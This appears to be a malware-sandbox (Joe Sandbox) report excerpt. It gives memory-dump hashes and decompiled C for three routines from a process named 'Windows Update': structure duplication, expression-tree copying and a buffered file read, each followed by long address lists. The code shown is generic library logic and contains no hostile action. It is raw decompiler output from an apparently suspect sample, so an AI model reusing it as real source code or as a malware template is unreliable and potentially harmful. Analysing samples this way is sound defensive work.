                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8c4982f388c7f7d5d60b93ffcbc1315885ab72514261100e15bd06cbd45c31a8
                                                                                                                    • Instruction ID: 97606d782200c08b9f18ad8bf66623031e47b36c7bae2783f17a406454c81e52
                                                                                                                    • Opcode Fuzzy Hash: 8c4982f388c7f7d5d60b93ffcbc1315885ab72514261100e15bd06cbd45c31a8
                                                                                                                    • Instruction Fuzzy Hash: D49153B194025DABDF20EA94CD46FEE77BCAB45740F0040A3F609E6042EB75AB849F64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00061547 Relevance: 6.2, APIs: 4, Instructions: 221COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00061547(intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int* _v20;
				signed int _t78;
				signed int* _t80;
				signed int _t81;
				signed short _t84;
				signed short _t89;
				signed short _t94;
				signed short _t102;
				signed short _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int* _t133;
				intOrPtr _t134;
				intOrPtr _t138;
				signed short* _t139;
				signed short _t140;
				signed short _t141;
				signed short _t142;
				signed short _t143;
				intOrPtr _t144;
				signed short* _t146;
				void* _t148;
				void* _t149;

				_t139 = _a8;
				if(_t139 != 0) {
					_t78 =  *_t139 & 0x0000ffff;
					if(_t78 <= 0) {
						_t132 = 0;
					} else {
						_t132 = (_t78 - 1) * 8 - _t78 - 1 << 3;
					}
					_t125 = _a4;
					_t4 = _t132 + 0x40; // 0x40
					_t80 = E0004E727(_a4, _t4);
					_t133 = _t80;
					_t149 = _t148 + 8;
					_v20 = _t133;
					if(_t133 != 0) {
						_t81 =  *_t139 & 0x0000ffff;
						_t133[0] = _t81;
						 *_t133 = _t81;
						_v12 = 0;
						if(0 <  *_t139) {
							_t134 = _t133 - _t139;
							_t146 =  &(_t139[4]);
							_v8 = _t134;
							do {
								_t140 =  *_t146;
								if(_t140 != 0) {
									_t84 = _t140;
									if( *_t140 != 0) {
										do {
											_t84 = _t84 + 1;
										} while ( *_t84 != 0);
									}
									_v16 = (_t84 - _t140 & 0x3fffffff) + 1;
									_t127 = E0004E727(_t125, (_t84 - _t140 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t127 != 0) {
										E00077337(_t127, _t140, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t127 = 0;
								}
								 *((intOrPtr*)(_t134 + _t146)) = _t127;
								_t141 = _t146[2];
								if(_t141 != 0) {
									_t89 = _t141;
									if( *_t141 != 0) {
										do {
											_t89 = _t89 + 1;
										} while ( *_t89 != 0);
									}
									_v16 = (_t89 - _t141 & 0x3fffffff) + 1;
									_t128 = E0004E727(_a4, (_t89 - _t141 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t128 != 0) {
										E00077337(_t128, _t141, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t128 = 0;
								}
								 *((intOrPtr*)(_t134 +  &(_t146[2]))) = _t128;
								_t142 = _t146[4];
								if(_t142 != 0) {
									_t94 = _t142;
									if( *_t142 != 0) {
										do {
											_t94 = _t94 + 1;
										} while ( *_t94 != 0);
									}
									_v16 = (_t94 - _t142 & 0x3fffffff) + 1;
									_t129 = E0004E727(_a4, (_t94 - _t142 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t129 != 0) {
										E00077337(_t129, _t142, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t129 = 0;
								}
								 *((intOrPtr*)(_t134 +  &(_t146[4]))) = _t129;
								 *((char*)(_t134 +  &(_t146[0xa]))) = _t146[0xa] & 0x000000ff;
								 *(_t134 +  &(_t146[0xc])) = _t146[0xc];
								 *((char*)(_t134 +  &(_t146[0xa]))) = _t146[0xa] & 0x000000ff;
								_t143 = _t146[0x18];
								if(_t143 != 0) {
									_t102 = _t143;
									if( *_t143 != 0) {
										do {
											_t102 = _t102 + 1;
										} while ( *_t102 != 0);
									}
									_v16 = (_t102 - _t143 & 0x3fffffff) + 1;
									_t130 = E0004E727(_a4, (_t102 - _t143 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t130 != 0) {
										E00077337(_t130, _t143, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t130 = 0;
								}
								 *((intOrPtr*)(_t134 +  &(_t146[0x18]))) = _t130;
								 *((char*)(_t134 +  &(_t146[0xb]))) = _t146[0xb];
								 *(_t134 +  &(_t146[0x1a])) = _t146[0x1a];
								_t109 = _t146[6];
								 *(_t134 +  &(_t146[6])) = _t109;
								if(_t109 != 0) {
									 *((short*)(_t109 + 0x20)) =  *((short*)(_t109 + 0x20)) + 1;
								}
								_t125 = _a4;
								_t110 = L00060E17(_a4, _t146[8], _a12);
								_t144 = _v8;
								 *((intOrPtr*)(_t144 +  &(_t146[8]))) = _t110;
								 *((intOrPtr*)(_t144 +  &(_t146[0xe]))) = E00036677(_a4, _t146[0xe], _a12, 0);
								_t112 = E00056BA7(_a4, _t146[0x10]);
								_t134 = _t144;
								_t138 = _v12 + 1;
								 *((intOrPtr*)(_t134 +  &(_t146[0x10]))) = _t112;
								 *(_t134 +  &(_t146[0x14])) = _t146[0x14];
								 *(_t134 +  &(_t146[0x16])) = _t146[0x16];
								_t149 = _t149 + 0x24;
								_t146 =  &(_t146[0x1c]);
								_v12 = _t138;
							} while (_t138 <  *_a8);
							_t133 = _v20;
						}
						return _t133;
					} else {
						return _t80;
					}
				} else {
					return 0;
				}
			}


































                                                                                                                    0x0006154e
                                                                                                                    0x00061553
                                                                                                                    0x0006155c
                                                                                                                    0x00061562
                                                                                                                    0x00061574
                                                                                                                    0x00061564
                                                                                                                    0x0006156f
                                                                                                                    0x0006156f
                                                                                                                    0x00061577
                                                                                                                    0x0006157a
                                                                                                                    0x0006157f
                                                                                                                    0x00061584
                                                                                                                    0x00061586
                                                                                                                    0x00061589
                                                                                                                    0x0006158e
                                                                                                                    0x00061596
                                                                                                                    0x00061599
                                                                                                                    0x0006159d
                                                                                                                    0x000615a2
                                                                                                                    0x000615ac
                                                                                                                    0x000615b2
                                                                                                                    0x000615b5
                                                                                                                    0x000615b8
                                                                                                                    0x000615bb
                                                                                                                    0x000615bb
                                                                                                                    0x000615bf
                                                                                                                    0x000615c8
                                                                                                                    0x000615ca
                                                                                                                    0x000615cc
                                                                                                                    0x000615cc
                                                                                                                    0x000615cd
                                                                                                                    0x000615cc
                                                                                                                    0x000615dc
                                                                                                                    0x000615e4
                                                                                                                    0x000615e6
                                                                                                                    0x000615eb
                                                                                                                    0x000615f2
                                                                                                                    0x000615f7
                                                                                                                    0x000615f7
                                                                                                                    0x000615fa
                                                                                                                    0x000615c1
                                                                                                                    0x000615c1
                                                                                                                    0x000615c1
                                                                                                                    0x000615fd
                                                                                                                    0x00061600
                                                                                                                    0x00061605
                                                                                                                    0x0006160e
                                                                                                                    0x00061610
                                                                                                                    0x00061617
                                                                                                                    0x00061617
                                                                                                                    0x00061618
                                                                                                                    0x00061617
                                                                                                                    0x00061629
                                                                                                                    0x00061631
                                                                                                                    0x00061633
                                                                                                                    0x00061638
                                                                                                                    0x0006163f
                                                                                                                    0x00061644
                                                                                                                    0x00061644
                                                                                                                    0x00061647
                                                                                                                    0x00061607
                                                                                                                    0x00061607
                                                                                                                    0x00061607
                                                                                                                    0x0006164a
                                                                                                                    0x0006164e
                                                                                                                    0x00061653
                                                                                                                    0x0006165c
                                                                                                                    0x0006165e
                                                                                                                    0x00061667
                                                                                                                    0x00061667
                                                                                                                    0x00061668
                                                                                                                    0x00061667
                                                                                                                    0x00061679
                                                                                                                    0x00061681
                                                                                                                    0x00061683
                                                                                                                    0x00061688
                                                                                                                    0x0006168f
                                                                                                                    0x00061694
                                                                                                                    0x00061694
                                                                                                                    0x00061697
                                                                                                                    0x00061655
                                                                                                                    0x00061655
                                                                                                                    0x00061655
                                                                                                                    0x0006169a
                                                                                                                    0x000616a2
                                                                                                                    0x000616a9
                                                                                                                    0x000616b1
                                                                                                                    0x000616b5
                                                                                                                    0x000616ba
                                                                                                                    0x000616c3
                                                                                                                    0x000616c5
                                                                                                                    0x000616c7
                                                                                                                    0x000616c7
                                                                                                                    0x000616c8
                                                                                                                    0x000616c7
                                                                                                                    0x000616d9
                                                                                                                    0x000616e1
                                                                                                                    0x000616e3
                                                                                                                    0x000616e8
                                                                                                                    0x000616ef
                                                                                                                    0x000616f4
                                                                                                                    0x000616f4
                                                                                                                    0x000616f7
                                                                                                                    0x000616bc
                                                                                                                    0x000616bc
                                                                                                                    0x000616bc
                                                                                                                    0x000616fa
                                                                                                                    0x00061701
                                                                                                                    0x00061708
                                                                                                                    0x0006170c
                                                                                                                    0x0006170f
                                                                                                                    0x00061715
                                                                                                                    0x00061717
                                                                                                                    0x00061717
                                                                                                                    0x0006171e
                                                                                                                    0x00061725
                                                                                                                    0x0006172a
                                                                                                                    0x00061732
                                                                                                                    0x0006173f
                                                                                                                    0x00061747
                                                                                                                    0x0006174f
                                                                                                                    0x00061751
                                                                                                                    0x00061752
                                                                                                                    0x00061759
                                                                                                                    0x00061760
                                                                                                                    0x00061767
                                                                                                                    0x0006176d
                                                                                                                    0x00061770
                                                                                                                    0x00061773
                                                                                                                    0x0006177b
                                                                                                                    0x0006177e
                                                                                                                    0x00061786
                                                                                                                    0x00061590
                                                                                                                    0x00061595
                                                                                                                    0x00061595
                                                                                                                    0x00061555
                                                                                                                    0x0006155b
                                                                                                                    0x0006155b

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a5cfa44bf03b20b72850cac4e78dce90d766afd3f216927f602a0fdccb3b748a
                                                                                                                    • Instruction ID: 2f0189ec1fdf2d0edb1d4d78ddcc91dc7fa098458484110485ffd03f5a9c19f1
                                                                                                                    • Opcode Fuzzy Hash: a5cfa44bf03b20b72850cac4e78dce90d766afd3f216927f602a0fdccb3b748a
                                                                                                                    • Instruction Fuzzy Hash: 2371E8799007419FDB218F74C840AAABBF6FF49314F1C45ADE89A87712E336DA12CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00036677 Relevance: 6.2, APIs: 4, Instructions: 201COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00036677(intOrPtr _a4, char _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				char _t72;
				signed int _t74;
				intOrPtr* _t95;
				intOrPtr _t100;
				void* _t105;
				signed int _t108;
				void* _t112;
				intOrPtr _t113;
				signed int _t121;
				char _t123;
				signed int _t126;
				char _t130;
				intOrPtr* _t132;
				char _t133;
				void* _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0) {
					return 0;
				} else {
					_t70 = _a12;
					_t132 = _a16;
					_t126 = _a12 & 0x00000001;
					_v12 = _t126;
					_v16 = 0;
					if(_t132 == 0) {
						_t72 = E0004E727(_a4, E00035517(_t130, _t70));
						_t126 = _v12;
						_t136 = _t136 + 0x10;
						_t133 = _t72;
					} else {
						_t133 =  *_t132;
						_v16 = 0x8000;
					}
					_a8 = _t133;
					if(_t133 == 0) {
						L35:
						return _t133;
					} else {
						if(_t126 != 0) {
							if( *((intOrPtr*)(_t130 + 8)) != 0 ||  *((intOrPtr*)(_t130 + 0xc)) != 0 ||  *((intOrPtr*)(_t130 + 0x14)) != 0) {
								L11:
								_t74 = 0x2018;
							} else {
								_t74 = 0x4008;
								if( *((intOrPtr*)(_t130 + 0x10)) != 0) {
									goto L11;
								}
							}
						} else {
							_t74 = _t126 + 0x30;
						}
						_t108 =  *(_t130 + 2) & 0x0000ffff;
						_v8 = _t74;
						_t75 = _t74 & 0x00000fff;
						_v24 = _t74 & 0x00000fff;
						if((_t108 & 0x00000800) != 0) {
							L15:
							_v20 = 0;
						} else {
							_t124 =  *((intOrPtr*)(_t130 + 4));
							if( *((intOrPtr*)(_t130 + 4)) == 0) {
								goto L15;
							} else {
								_t105 = E00062267(_t124);
								_t136 = _t136 + 4;
								_v20 = _t105 + 1;
								_t75 = _v24;
							}
						}
						if(_t126 == 0) {
							if((_t108 & 0x00004000) == 0) {
								asm("sbb ebx, ebx");
								_t112 = ( ~(_t108 & 0x00002000) & 0xffffffe8) + 0x30;
							} else {
								_t112 = 8;
							}
							E00077337(_t133, _t130, _t112);
							E00077C87(_a8 + _t112, 0, 0x30 - _t112);
							_t137 = _t136 + 0x18;
						} else {
							E00077337(_t133, _t130, _t75);
							_t137 = _t136 + 0xc;
						}
						 *(_t133 + 2) = _v8 & 0x00006000 |  *(_t133 + 2) & 0x00001fff | _v16;
						_t120 = _v20;
						if(_v20 != 0) {
							 *((intOrPtr*)(_t133 + 4)) = _a8 + _v24;
							E00077337(_a8 + _v24,  *((intOrPtr*)(_t130 + 4)), _t120);
							_t137 = _t137 + 0xc;
						}
						_t121 =  *(_t130 + 2) & 0x0000ffff;
						_t113 = _a4;
						if(0 == (( *(_t133 + 2) | _t121) & 0x00004000)) {
							_push(_v12);
							_push( *((intOrPtr*)(_t130 + 0x10)));
							_push(_t113);
							if((_t121 & 0x00001000) == 0) {
								_t100 = E00053147();
							} else {
								_t100 = L00060E17();
							}
							 *((intOrPtr*)(_t133 + 0x10)) = _t100;
							_t137 = _t137 + 0xc;
						}
						if(( *(_t133 + 2) & 0x00006000) == 0) {
							 *((short*)(_t133 + 0x22)) = 0;
							if(( *(_t130 + 2) & 0x00004000) != 0) {
								goto L34;
							} else {
								 *((intOrPtr*)(_t133 + 8)) = E00036677(_t113,  *((intOrPtr*)(_t130 + 8)), 0, 0);
								 *((intOrPtr*)(_t133 + 0xc)) = E00036677(_t113,  *((intOrPtr*)(_t130 + 0xc)), 0, 0);
								return _t133;
							}
						} else {
							_t123 = _a8 + E000354A7(_t130, _a12);
							_a8 = _t123;
							if(( *(_t133 + 2) & 0x00002000) != 0) {
								 *((intOrPtr*)(_t133 + 8)) = E00036677(_t113,  *((intOrPtr*)(_t130 + 8)), 1,  &_a8);
								 *((intOrPtr*)(_t133 + 0xc)) = E00036677(_t113,  *((intOrPtr*)(_t130 + 0xc)), 1,  &_a8);
								_t123 = _a8;
							}
							_t95 = _a16;
							if(_t95 != 0) {
								 *_t95 = _t123;
							}
							L34:
							goto L35;
						}
					}
				}
			}
























                                                                                                                    0x0003667e
                                                                                                                    0x00036683
                                                                                                                    0x000368a8
                                                                                                                    0x00036689
                                                                                                                    0x00036689
                                                                                                                    0x0003668d
                                                                                                                    0x00036692
                                                                                                                    0x00036695
                                                                                                                    0x00036698
                                                                                                                    0x000366a1
                                                                                                                    0x000366b9
                                                                                                                    0x000366be
                                                                                                                    0x000366c1
                                                                                                                    0x000366c4
                                                                                                                    0x000366a3
                                                                                                                    0x000366a3
                                                                                                                    0x000366a5
                                                                                                                    0x000366a5
                                                                                                                    0x000366c6
                                                                                                                    0x000366cb
                                                                                                                    0x0003685d
                                                                                                                    0x00036864
                                                                                                                    0x000366d1
                                                                                                                    0x000366d3
                                                                                                                    0x000366de
                                                                                                                    0x000366f7
                                                                                                                    0x000366f7
                                                                                                                    0x000366ec
                                                                                                                    0x000366f0
                                                                                                                    0x000366f5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000366f5
                                                                                                                    0x000366d5
                                                                                                                    0x000366d5
                                                                                                                    0x000366d5
                                                                                                                    0x000366fd
                                                                                                                    0x00036701
                                                                                                                    0x00036704
                                                                                                                    0x00036709
                                                                                                                    0x00036712
                                                                                                                    0x0003672d
                                                                                                                    0x0003672d
                                                                                                                    0x00036714
                                                                                                                    0x00036714
                                                                                                                    0x00036719
                                                                                                                    0x00000000
                                                                                                                    0x0003671b
                                                                                                                    0x0003671c
                                                                                                                    0x00036721
                                                                                                                    0x00036725
                                                                                                                    0x00036728
                                                                                                                    0x00036728
                                                                                                                    0x00036719
                                                                                                                    0x00036736
                                                                                                                    0x0003674b
                                                                                                                    0x0003675c
                                                                                                                    0x00036761
                                                                                                                    0x0003674d
                                                                                                                    0x0003674d
                                                                                                                    0x0003674d
                                                                                                                    0x00036767
                                                                                                                    0x0003677c
                                                                                                                    0x00036781
                                                                                                                    0x00036738
                                                                                                                    0x0003673b
                                                                                                                    0x00036740
                                                                                                                    0x00036740
                                                                                                                    0x000367a0
                                                                                                                    0x000367a4
                                                                                                                    0x000367a9
                                                                                                                    0x000367b2
                                                                                                                    0x000367b9
                                                                                                                    0x000367be
                                                                                                                    0x000367be
                                                                                                                    0x000367c1
                                                                                                                    0x000367c9
                                                                                                                    0x000367dc
                                                                                                                    0x000367de
                                                                                                                    0x000367e1
                                                                                                                    0x000367e4
                                                                                                                    0x000367eb
                                                                                                                    0x000367f4
                                                                                                                    0x000367ed
                                                                                                                    0x000367ed
                                                                                                                    0x000367ed
                                                                                                                    0x000367f9
                                                                                                                    0x000367fc
                                                                                                                    0x000367fc
                                                                                                                    0x00036808
                                                                                                                    0x00036867
                                                                                                                    0x00036874
                                                                                                                    0x00000000
                                                                                                                    0x00036876
                                                                                                                    0x00036887
                                                                                                                    0x00036896
                                                                                                                    0x000368a1
                                                                                                                    0x000368a1
                                                                                                                    0x0003680a
                                                                                                                    0x00036816
                                                                                                                    0x00036820
                                                                                                                    0x00036827
                                                                                                                    0x00036838
                                                                                                                    0x0003684a
                                                                                                                    0x0003684d
                                                                                                                    0x00036850
                                                                                                                    0x00036853
                                                                                                                    0x00036858
                                                                                                                    0x0003685a
                                                                                                                    0x0003685a
                                                                                                                    0x0003685c
                                                                                                                    0x00000000
                                                                                                                    0x0003685c
                                                                                                                    0x00036808
                                                                                                                    0x000366cb

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1357608183-0
                                                                                                                    • Opcode ID: 8dad90dc06fccf1d0fce5a3f5a61b94d905bb9cd5d45d26637a828d7000bc66e
                                                                                                                    • Instruction ID: b5e508a6defad36eba066b1555ae31a32431a09eabd9380c39b00fea1f94c656
                                                                                                                    • Opcode Fuzzy Hash: 8dad90dc06fccf1d0fce5a3f5a61b94d905bb9cd5d45d26637a828d7000bc66e
                                                                                                                    • Instruction Fuzzy Hash: 8A61D2B5A00605BBEB25DF64D842BABB7BCFF04304F04C529F91997641E736E950CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00079500 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 69%
                                                                                                                    			E00079500(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00077C87(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E0007F3E8(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00077C87(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E0007C705())) = 0x22;
												L4:
												E0007C696();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v8 = _t110 + 1;
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(L0007EF23(_t119));
											_t88 = E00080139();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										L0007FFB2(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t120 = _t120 + 0x10;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E0007C705())) = 0x16;
				goto L4;
			}




























                                                                                                                    0x0007950a
                                                                                                                    0x0007950d
                                                                                                                    0x00079513
                                                                                                                    0x00079516
                                                                                                                    0x00079519
                                                                                                                    0x00079536
                                                                                                                    0x00000000
                                                                                                                    0x00079536
                                                                                                                    0x0007951b
                                                                                                                    0x00079520
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00079524
                                                                                                                    0x0007953d
                                                                                                                    0x00079540
                                                                                                                    0x00079542
                                                                                                                    0x00079550
                                                                                                                    0x00079550
                                                                                                                    0x00079554
                                                                                                                    0x0007955c
                                                                                                                    0x00079561
                                                                                                                    0x00079561
                                                                                                                    0x00079564
                                                                                                                    0x00079566
                                                                                                                    0x00000000
                                                                                                                    0x00079568
                                                                                                                    0x00079568
                                                                                                                    0x00079570
                                                                                                                    0x00079572
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00079574
                                                                                                                    0x00079577
                                                                                                                    0x0007957a
                                                                                                                    0x00079581
                                                                                                                    0x00079583
                                                                                                                    0x0007958a
                                                                                                                    0x00079585
                                                                                                                    0x00079585
                                                                                                                    0x00079585
                                                                                                                    0x0007958f
                                                                                                                    0x00079592
                                                                                                                    0x00079594
                                                                                                                    0x0007967d
                                                                                                                    0x00000000
                                                                                                                    0x0007959a
                                                                                                                    0x0007959a
                                                                                                                    0x0007959a
                                                                                                                    0x000795a1
                                                                                                                    0x000795e2
                                                                                                                    0x000795e2
                                                                                                                    0x000795e4
                                                                                                                    0x0007964f
                                                                                                                    0x00079655
                                                                                                                    0x00079658
                                                                                                                    0x000796af
                                                                                                                    0x00000000
                                                                                                                    0x000796b5
                                                                                                                    0x0007965a
                                                                                                                    0x0007965d
                                                                                                                    0x0007965f
                                                                                                                    0x00079685
                                                                                                                    0x00079685
                                                                                                                    0x00079689
                                                                                                                    0x00079693
                                                                                                                    0x00079698
                                                                                                                    0x000796a0
                                                                                                                    0x00079531
                                                                                                                    0x00079531
                                                                                                                    0x00000000
                                                                                                                    0x00079531
                                                                                                                    0x00079661
                                                                                                                    0x00079664
                                                                                                                    0x00079667
                                                                                                                    0x00079668
                                                                                                                    0x00079668
                                                                                                                    0x00079669
                                                                                                                    0x0007966c
                                                                                                                    0x0007966f
                                                                                                                    0x00079672
                                                                                                                    0x00000000
                                                                                                                    0x00079672
                                                                                                                    0x000795e6
                                                                                                                    0x000795e8
                                                                                                                    0x0007960c
                                                                                                                    0x00079611
                                                                                                                    0x00079617
                                                                                                                    0x00079619
                                                                                                                    0x00079619
                                                                                                                    0x000795ea
                                                                                                                    0x000795ec
                                                                                                                    0x000795f2
                                                                                                                    0x00079604
                                                                                                                    0x00079604
                                                                                                                    0x00079604
                                                                                                                    0x00079606
                                                                                                                    0x000795f4
                                                                                                                    0x000795f9
                                                                                                                    0x000795fb
                                                                                                                    0x000795fb
                                                                                                                    0x00079608
                                                                                                                    0x00079608
                                                                                                                    0x0007961b
                                                                                                                    0x0007961e
                                                                                                                    0x00000000
                                                                                                                    0x00079620
                                                                                                                    0x00079620
                                                                                                                    0x00079621
                                                                                                                    0x0007962b
                                                                                                                    0x0007962c
                                                                                                                    0x00079631
                                                                                                                    0x00079634
                                                                                                                    0x00079636
                                                                                                                    0x000796bd
                                                                                                                    0x00000000
                                                                                                                    0x000796bd
                                                                                                                    0x0007963c
                                                                                                                    0x0007963f
                                                                                                                    0x000796ab
                                                                                                                    0x000796ab
                                                                                                                    0x000796ab
                                                                                                                    0x000796ab
                                                                                                                    0x00000000
                                                                                                                    0x000796ab
                                                                                                                    0x00079641
                                                                                                                    0x00079641
                                                                                                                    0x00079643
                                                                                                                    0x00079643
                                                                                                                    0x00079646
                                                                                                                    0x00079649
                                                                                                                    0x00000000
                                                                                                                    0x00079649
                                                                                                                    0x0007961e
                                                                                                                    0x000795a3
                                                                                                                    0x000795a6
                                                                                                                    0x000795a9
                                                                                                                    0x000795ab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000795ad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000795b3
                                                                                                                    0x000795b5
                                                                                                                    0x000795b7
                                                                                                                    0x000795b9
                                                                                                                    0x000795b9
                                                                                                                    0x000795bc
                                                                                                                    0x000795bf
                                                                                                                    0x000795c1
                                                                                                                    0x00000000
                                                                                                                    0x000795c7
                                                                                                                    0x000795ce
                                                                                                                    0x000795d3
                                                                                                                    0x000795d6
                                                                                                                    0x000795d9
                                                                                                                    0x000795dc
                                                                                                                    0x000795de
                                                                                                                    0x00000000
